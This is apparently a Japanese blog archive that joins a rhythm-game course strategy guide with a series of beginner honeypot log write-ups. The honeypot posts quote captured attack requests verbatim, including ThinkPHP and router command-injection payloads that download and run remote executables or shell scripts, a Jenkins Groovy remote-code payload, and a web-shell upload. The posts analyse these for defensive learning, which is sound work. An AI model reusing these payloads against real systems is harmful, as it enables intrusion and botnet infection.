暴龍天攻略法
自分は1年前に暴龍天に受かりました。
その時はクロニエール回でしたが、自分はクロニエールがかなり苦手でした。
なので自分が受かった時とその後1年プレイしての振り返りとして記事にしてみます。
※現在は金枠暴龍天です。なので、参考になるかは微妙です・・・
まず、現在暴龍天は4コースあります。
自分のおすすめはAコース、Bコース、第二回の三つです。
第3回はMixxionがスキアナでやると激ムズだったので・・・
受ける前の前提として
・挑戦する譜面はすべてクリアしておく
・各コース最後の20以外は常にクリアできる安定感を付けておく
これは本当に前提条件です。
自分の合格時はVF19.0ぐらい(クリムゾン乗ってちょっとしてから)
暴龍天を意識し始めてからようやく暴龍天を取れました。
ゲーセン以外では特に練習していません。
※取るぞという意識が大事
とりあえず焦らずコツコツ練習しましょう。すぐ取れる人もいますが、数か月かかっても気にしないことが大事です。他人と比較せず、過去、昨日の自分と比較することが大事です。
先に書いた前提条件をクリアしていなくても受かる人はいますが、沼にハマる可能性が高いのでとにかく背伸びせずコツコツやりましょう。
◆Aコース
皆大好きクロニエール回です。
全部二重階段が絡んできます。
なので二重階段が取れればどうにかなります。
一番の近道はガチ押しせずにCross Fireを安定させることです。
なのでCross Fireがうまく取れない場合は適正ではないかと思います。
ΑΩ
この二重階段が難しいです。
でもここさえ覚えてしまえばあとは地力でどうにかなると思います。
とりあえずここを癖つかない程度に練習すると良いかと思います。
とは言ってもΑΩだけで練習すると必ず癖がついてしまうので、コース初めのCross Fire、BOFやGhost Family Living In Graveyardみたいな二重階段多めのやつを安定して取れるように練習しましょう。
BOFがS安定するぐらいの実力なら、あとはΑΩ練習で大丈夫かと思います。
※取り方を意識して、BPMの遅い譜面からコツコツ練習していけば自然と反応できるようになると思います。
あとはスキアナでクロニエール初めに30%程度残っていれば合格できるとおもうので、最低そこら辺までゲージを残せるようになればOKです。それ以下でもクロニエールの序盤が安定していればいけます。
クロニエール
序盤とラストのここは餡蜜しましょう、餡蜜覚えればほとんど落とすことはなくなります。
ここの階段は早めなので反射的に手が動くように他の譜面で似たような配置を練習しましょう。取り方がわかっていて手が動くようであればひたすら練習すればとれるようになると思います。
クロニエールは序盤のここが取れればあとは地力でどうにかなります。
合格オメデトウ!!
◆Bコース
もしかしたらBコースが一番楽って人も多いかもしれないです。
BコースはIだけ難しいので・・・
I
?????
って思うかもしれないですが、「Iつまみ簡略化」とかで検索すれば取り方が出てくるので練習すれば大丈夫です。意外とゲージが残せるようになります。
どっちかというとここの方が難しいと思います。
ここは地力がとにかく絡んでくるので、19の譜面をひたすらプレイして地力を伸ばしていきましょう、もしくは18Sを練習、17で995↑量産で地力は伸ばせると思います。
※ロングとFX、鍵盤つまみが絡む最初は慣れるしかないです・・・
自分は暴龍天初合格の日にA、Bの両コース合格したのですが、どっちかというとBコースの方が楽でした。
◆第二回コース
この回を受けた時には余裕だったので書きずらいですが、OUTERHEAVENとXHRONOXAPSULが肝だと思います。
リサリシアは特に対策要らないと思います。
OUTERHEAVEN
とりあえずここが取れればあとは地力でどうにかなります。
青つまみ→三つ同時押し→上画像部分の流れを頭に入れておきましょう。
三つ同時押しが二つ→「来る!」となればあとは大丈夫です。運指を叩きこんでおきましょう。
XHRONOXAPSULΞ
序盤は簡単です。序盤は練習あるのみです。
ここは地力があれば、何となく取れると思います。
↑これが連続で来るだけなので、ノリがわかれば押せます。
ここは抜けやすいので、つまみを間違えないように練習しましょう。
この譜面はここからです。
ここですね。
FXと鍵盤が交互になっている部分はゴリ押ししましょう、何ならFXと鍵盤を同時押しでごまかせば何とかなると思います。
今後のことを考えれば運指を組むことをオススメしますが、合格するという観点だとゴリ押しをお勧めします。ホームポジションでゴリ押ししてください・・・w
FX鍵盤地帯を抜けてラストに高速鍵盤が来ますが、ここもゴリ押しですw
とにかく最後はゴリ押しすれば合格できるかと思います。
第三回は深堀しませんが、地力ゲーです。
各コース紹介していきました。
自分が大事にしていたこととして
・各譜面に必ず難しい部分があるので、譜面を確認すること
・19、20を積極的にプレイする
・癖がつかないようにいろんな譜面にさわること
・上手い人のプレイ動画を見て運指のイメージを掴む
等だと思います。
とにかく焦らず、うまくなるための意識と練習をしていれば回数はかかれども必ず取れます。
合格オメデトウ!
ハニーポットログ観察3-3
5/5~5/9までのログを見ていきたいと思います。
アクセス先
GET /console/login/LoginForm.jsp GET http://www.google.com/intl/zh-CN/ GET /acadmin.php GET http://[]/testget?q=23333&port=80 *1 GET /w00tw00t.at.blackhats.romanian.anti-sec:) GET /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('[]/download.exe','C:/Windows/temp/qkkhbrukxwmomfv21893.exe');start%20C:/Windows/temp/qkkhbrukxwmomfv21893.exe *2 GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('[]/download.exe','C:/Windows/temp/qkkhbrukxwmomfv21893.exe');start%20C:/Windows/temp/qkkhbrukxwmomfv21893.exe GET /js/preload/example.txt GET /cgi-bin GET /admin-scripts.asp GET /2/wp-login.php GET /3/wp-login.php GET /wordpress/wp-login.php GET /wp1/wp-login.php GET /wp-login.php GET ///?author=1 GET ///wp-json/wp/v2/users/ GET /struts2-rest-showcase/orders.xhtml GET /index.action //ソースコード付 GET /TP/public/index.php GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 GET /nmaplowercheck1557288129 GET /NmapUpperCheck1557288129 GET /Nmap/folder/check1557288129 GET /evox/about GET /HNAP1 GET /struts2-rest-showcase/orders.xhtml GET /index.action GET /index.do GET http[:]//www.sbjudge3.com/azenv.php GET /js/preload/example.txt GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27LFZQExtWuxjVTXjsqGnebQq%27,%20root=%27http[:]//185.162.235[.]211%27)%0a@Grab(group=%27package%27,%20module=%27LFZQExtWuxjVTXjsqGnebQq%27,%20version=%271%27)%0aimport%20LFZQExtWuxjVTXjsqGnebQq; GET /device.rsp?opt=user&cmd=list GET /device.rsp?opt=user&cmd=list POST /3/xmlrpc.php POST /TP/public/index.php?s=captcha POST /users?page=&size=5 POST /sdk *3 POST /2/xmlrpc.php POST /xmlrpc.php POST /wp1/xmlrpc.php POST /3/xmlrpc.php HEAD / HEAD HEAD http[:]//112.124.42[.]80:63435//robots.txt CONNECT www.netflix.com:443
virus total: 1 VirusTotal
code 3(サイトは無害)
<soap:Envelope xmlns:xsd="http[:]//www.w3.org/2001/XMLSchema" xmlns:xsi="http[:]//www.w3.org/2001/XMLSchema-instance" xmlns:soap="http[:]//schemas.xmlsoap.org/soap/envelope/"><soap:Header>
考察
1.GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile~
Jenkinsの脆弱性をついた攻撃 Jenkinsとは Jenkins - Wikipedia
CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1003000
ユーザーが未認証のGETリクエストを発行してGroovyメタプログラミング入力を送ることができる。 このサイトに詳しく書いてある。 https://0xdf.gitlab.io/2019/02/27/playing-with-jenkins-rce-vulnerability.html
2.POST /sdk
Nmapによるポートスキャン
感想
新しい物について触れているので今回は内容浅めです。 新しい物がでてきたらそれについての記事を書いてみようかなと思います。
ハニーポットログ観察 3-2
5/1~5/5 5日分を見ていきたいと思います。
アクセス先
GET http://www.ceek.jp/?rands=[] GET http://www.baidu.com GET http://www.google.com/ GET /manager/html GET /.env GET /admin/assets/js/views/login.js GET /favicon.ico GET /sitemap.xml GET /.git/config GET http://[感染サイトのため伏]/echo.php GET /upload/bank-icons/bank-gh.jpg GET /upload/bank-icons/bank_16.png GET /TP/public/index.php GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 GET /nx8j78af1b.jsp GET /login.cgi?cli=aa%20aa%27;wget%20http://[↓]/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ *1 GET /script GET http://[]/testget?q=23333&port=80 *2 GET /.well-known/security.txt GET /Lists/admin.php GET /wp-login.php GET ///?author=1 GET ///wp-json/wp/v2/users/ GET /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://[]/download.exe','C:/Windows/temp/ztlkmociezbzjeo31521.exe');start%20C:/Windows/temp/ztlkmociezbzjeo31521.exe *3 GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://[]/download.exe','C:/Windows/temp/ztlkmociezbzjeo31521.exe');start%20C:/Windows/temp/ztlkmociezbzjeo31521.exe GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=wget%20http://[]/a_thk.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a *4 GET /w00tw00t.at.blackhats.romanian.anti-sec:) GET /phpMyAdmin/scripts/setup.php GET /pma/scripts/setup.php GET /phpmy/scripts/setup.php GET /MyAdmin/scripts/setup.php GET /console/login/LoginForm.jsp GET http://api.ipify.org/ GET http://www.123cha.com/ GET http://www.ip.cn/ GET /blog/wp-includes/wlwmanifest.xml GET /wordpress/wp-includes/wlwmanifest.xml GET /jmx-console/ GET /HNAP1/ GET ttp[]//azenv.net/ GET /admin-scripts.asp POST /TP/public/index.php?s=captcha POST /tmUnblock.cgi POST /users?page=&size=5 CONNECT www.google.com:443 CONNECT www.baidu.com:443 CONNECT cn.bing.com:443 PUT /FxCodeShell.jsp::$DATA HEAD /robots.txt OPTIONS /
(virus total 1VirusTotal
2VirusTotal, 3VirusTotal, 4VirusTotal)
考察
このログと考察を書く時間がだいぶずれてしまったので、当時何を書こうか思い出せない状態ですが、 パッと見たところ気になるものを書いてみたいと思います。
1.GET /sitemap.xml
サイトマップのチェック サイトマップとは(サイトマップについて - Search Console ヘルプ)
2.GET /public/index.php?s=index/think\app/invokefunction~
Think PHP というフレームワークへの攻撃 中国で割とポピュラーなフレームワークの脆弱性らしい 詳しくはここ
や
ThinkPHPという中国のフレームワークの脆弱性が狙われて、中国の45000のサイトが攻撃を受け続けている - orangeitems’s diary この方のブログに詳しく乗っています。 結構大きい攻撃ということがわかりますね。 恐ろしいというか気持ち悪いというか。。。
3.GET /login.cgi?cli=aa%20aa%27;wget%20http~
satoriっぽいです。Mirai亜種とか言われていますね。 攻撃に成功した場合、ボットネットを構築されてしまう。つまりMirai同様拡散されていくタイプですね。 攻撃の内容については、別記事で自分なりにリサーチしてみたいと思っています。 まあ調べればほかの方が調べた記事などが出てくるので詳しく知りたい方はそちらを 参照してもらえばと思います。
4.GET http:///testget?q=23333&port=80
悪意のあるスクリプトを動かそうとしているのだと思います。 普通にVirusTotalではmaliciousの判定になった。 詳しいことはわかりませんが'23333'は日本語で言うところの'爆笑'みたいな 中国のスラングっぽい。
5.GET /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]=cmd.exe%20/c%20powershell~
明らかに攻撃しているのがわかります。 途中で切っていますが 先ほど挙げたThinkPHPへの攻撃から始まり、powershellを起動しマルウェアを ダウンロードしようとしているのだと思います。 Windowsを狙った攻撃のように見えますね。 ztlkmociezbzjeo31521.exeはよくわからない。詳しく解析する必要があります。
6.GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient)~
上同様ThinkPHPの脆弱性を利用した攻撃を踏まえてのさらなる攻撃っぽいです。
7.GET /w00tw00t.at.blackhats.romanian.anti-sec:)
phpMyAdminへの攻撃。 とにかく沢山来ます。 詳しくは ozuma.hatenablog.jp この方のブログがとても分かりやすいです。
感想
とにかく不正中継やphpMyAdminを狙った攻撃など、多い攻撃のパターンがわかってきました。その中に少し真新しいのがある感じかな。 ログが沢山溜まってきたので面白そうなものがあったらそれだけについての記事なども書いてみたいです。 普通に解析楽しいです。
今回はこんな感じで終わりにします。
ハニーポットログ観察3-1
- 今回は4/26から平成最後の30日分のログを観察していきたいと思います。 最近gw明けでまとめる気がおきず、引きずってました。 明日から本気出します。 基本的にアクセス先を列挙していきます。
また、今度からフィールド内の内容や、ポートを明記します。失礼しました。
アクセス先
GET http://httpheader[.]net/ GET /cgi-bin/authLogin.cgi GET /TP/public/index.php GET /robots.txt GET /sitemap.xml GET /.well-known/security.txt GET /manager/html GET /webdav/ GET /.env GET /help.php GET /java.php GET /_query.php GET /db_pma.php GET /db_cts.php GET /test.php GET /logon.php GET /help-e.php GET /license.php GET /log.php GET /hell.php GET /pmd_online.php GET /x.php GET /htdocs.php GET /shell.php GET /desktop.ini.php GET /z.php GET /lala.php GET /lala-dpr.php GET /wpc.php GET /wpo.php GET /t6nv.php GET /muhstik.php GET /text.php GET /wp-config.php GET /muhstik.php GET /muhstik2.php GET /muhstiks.php GET /muhstik-dpr.php GET /lol.php GET /uploader.php GET /cmd.php GET /cmv.php GET /cmdd.php GET /App3199c780.php GET /admin/assets/js/views/login.js GET /favicon.ico GET /index.php // 他にもディレクトリを指定して沢山 (/../index.php) GET //webfig/ GET /Lists/admin.php GET /db/ GET /admin/ GET /pma/ GET /myadmin/ GET /phpmyadmin/ GET /dbadmin/ GET /backup/ GET /phpMyAdmin/ GET /admin-scripts.asp GET /nx8j78af1b.jsp GET ttp://api[.]ipify.org/ GET ttp://www[.]ip.cn/ GET /Lists/admin.php GET /jmx-console POST /tmUnblock.cgi POST /TP/public/index.php?s=captcha POST /mybestloves.php POST /GponForm/diag_Form?images/ PUT /FxCodeShell.jsp%20 PUT /FxCodeShell.jsp::$DATA GET /FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=ttp://fid[.]hognoob.se/download.exe CONNECT www.netflix.com:443 CONNECT www.google.com:443 CONNECT www.baidu.com:443 CONNECT www.instagram.com:443 CONNECT 133[.]130[.]126[.]119:43 //ip先自体は無害っぽい OPTIONS / PROPFIND /
考察
今回は5日分あるので、多めですね。 なのでいままで観測の無かったものを上げていって、簡単に内容をまとめ、考察していきます。 今回は長々となりそうですが、ご愛敬ください(笑)。 また、気になったモノなどを挙げていきます。
1.GET /cgi-bin/authLogin.cgi
shellshockというBash脆弱性を突いたNASシステムへの攻撃 https://www.fireeye.jp/company/press-releases/2014/the-shellshock-aftershock-for-nas-administrators.html
2.GET /TP/public/index.php
ThinkPHPの脆弱性を狙った攻撃 https://www.orangeitems.com/entry/2018/12/24/000500
3.GET /.well-known/security.txt
/well-known はドメインの存在確認(認証)を行うためにNTTPC側で自動作成するディレクトリらしい その中のsecurity.txtを取得しようと攻撃しているのかも https://faq.nttpc.co.jp/faq/show/13553?site_domain=suitex
4.GET /webdav/
webdavの調査 https://ja.wikipedia.org/wiki/WebDAV
5GET ./admin/assets/js/views/login.js
Free PBXの調査
6.GET /App3199c780.php,
謎 調査次第更新します。
7.GET /nx8j78af1b.jsp
JavaServer Pagesファイルの調査
8.GET jmx-console
jmx-consoleの調査だと思われる。 ※jmx-console JBossによって開発されたメッセージング・プラットフォーム(JBoss Messaging) https://www.atmarkit.co.jp/ait/articles/1001/08/news121_2.html
9.POST /TP/public/index.php?s=captcha
ThinkPHPの脆弱性を狙った攻撃
10.POST /GponForm/diag_Form?images/
GPON Home Routerの脆弱性を狙った攻撃 https://www.kccs.co.jp/secureowl/column/column10003.html
11.PUT /FxCodeShell.jsp%20
FxCodeShell.jspをPUTしてサーバーへアップロード↓ https://www.morihi-soc.net/?p=811
12.GET /FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=ttp://fid[.]hognoob.se/download.exe
PUTでFxCodeShell.jspをアップロード後、マルウェアをダウンロードし攻撃
13.その他CONNECT系
Webサイトの不正利用や踏み台に利用 https://www.morihi-soc.net/?p=392
感想
今回も雑な書き方になってしました。(沢山の参考にさせていただいたサイト様ありがとうございます。) 前よりも様々な攻撃が来るようになった気がします。一日の総アクセス数も1万近いです。
個人的に気になったことは、FxCodeShellの部分です。 これは中身を詳しく調べてこれだけで記事を書いてみたいと思いました。 特にあまり書くこともないので、本日はこのくらいにしておきます。
ハニーポットログ観察2
4/25日分を分析していきたいと思います。
総アクセス数2935
アクセス先
GET http://www.ceek.jp/?rands=[] GET http://www.baidu.com/?rands=[] GET /manager/html GET /.env GET /admin/assets/js/views/login.js GET /favicon.ico POST /tmUnblock.cgi
考察
新たに観測したのは GET/.env と GET /admin/assets/js/views/login.jsの 2つです。
1つ目は.env アプリケーションの環境設定用のファイルです。 このファイルを調査しているっぽいですね。
2つ目はfreepbxの脆弱性を突く攻撃っぽいです。
感想
やっと攻撃に慣れてきました。w もっと面白い攻撃も見てみたいので、ポートの設定なども変更していければと思います
後はアクセス先ばかり載せていても、あまりリサーチの結果を使えていないので 時間があるときにしっかりと分析してみます。
ハニーポットログ観察1
4/24日分を分析していきたいと思います。
総アクセス数4542
アクセス先
GET http://[ip]/echo.php // []内は伏せておきます GET http://[ip]/testget?q=23333&port=80 GET /manager/html GET http://www.neti.ee/?[] GET http://m.baidu.com/?[] POST /tmUnblock.cgi
8080番ポートへのスキャン
感想
今回も、ログの殆どがTomcatに対する攻撃でした。 内容はしっかりと分析していませんが、殆どが総当りでしょう。
気になった攻撃はtmUnblock.cgiの部分ですね、調べてみると Linksys(ルーター)の脆弱性を突いた攻撃っぽいです
ttcp_ip=-h+`cd+/tmp;+rm+-rf+mpsl;+wget+http://[IP]/vb/mpsl;+chmod+777+mpsl;+./mpsl+linksys`&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1
virus totalに突っ込んでみるとmiraiと帰ってきました。 派生系などが中々流行ってるみたいですね。
詳しくは後々追記していきます。
Honeypotを植えて5日が経過しました。
Wow Honeypotを植えてから5日が立ちました 1日目から攻撃がまあまあ来ていてびっくりしましたが、2日目からは当たり前のように大量のアクセスが来て普通に怖いです;
今回は昨日分(19/4/23)のlogを見ていきたいと思います。
総アクセス数は4142件でした。(怖い) 多すぎるので大まかに取り上げていきたいと思います。
GET /manager/html #Tomcatへの攻撃 GET //MyAdmin/scripts/setup.php #php myadmin攻撃 GET /muieblackcat #Web scanner GET /robots.txt GET //recordings/misc/play_page.php GET /webdav/ GET htt[:]//api.ipify.org/ #その他baidu など不正中継 CONNECT www.~~~ #中間者攻撃? PROFIND
その他masscanなどのスキャンも見られました。
今回の攻撃ログの大半は GET manager/htmlで占められていました。しかも攻撃者は同IPで今まで8004件もの攻撃を自ハニーポットにアクセスしていました。(23日でのアクセスは4000以上) おそらくブルートフォース攻撃を仕掛けてきたのだと思います。
気になったのは、PROFIND 調べたところ、webdavのメソッドでファイルを操作できるっぽいです。webdavの脆弱性?っぽい際どいとこついてきますね。
recordings/misc/~~ というのはどうやらFreePBXという電話交換機的なのを調査しているっぽいです。
また、muieblackcatというボットがあるらしいです。 ボットはsetup/phpを探索するようです。 ボットというのが動いているのは恐ろしいですね。
構築から5日経ったはといえ、じっくり眺めたのは今回初めての経験だったので、とてもわくわくでしたね。 初心者なのでまだまだ理解できていない攻撃や、未知の攻撃が多種存在しているので、どんどん上げていきたいと思います。
また、最後に今回の記事で見にくい部分や、間違っている部分は追々訂正していきたいと思います。
今回の参考記事 Tomcatへの攻撃:
Tomcat 7 security - attempt to login? - Stack Overflow
phpMyadminへの攻撃:
phpMyAdminを狙った攻撃観察 - ろば電子が詰まつてゐる
Webdav PROFIND:
https://www.1nenmotsukana.info/?p=2346
muieblackcat:
Muieblackcat setup.php Web Scanner/Robot
中間者攻撃:
ハニーポット観察記録(23) at www.morihi-soc.net
FreePBX: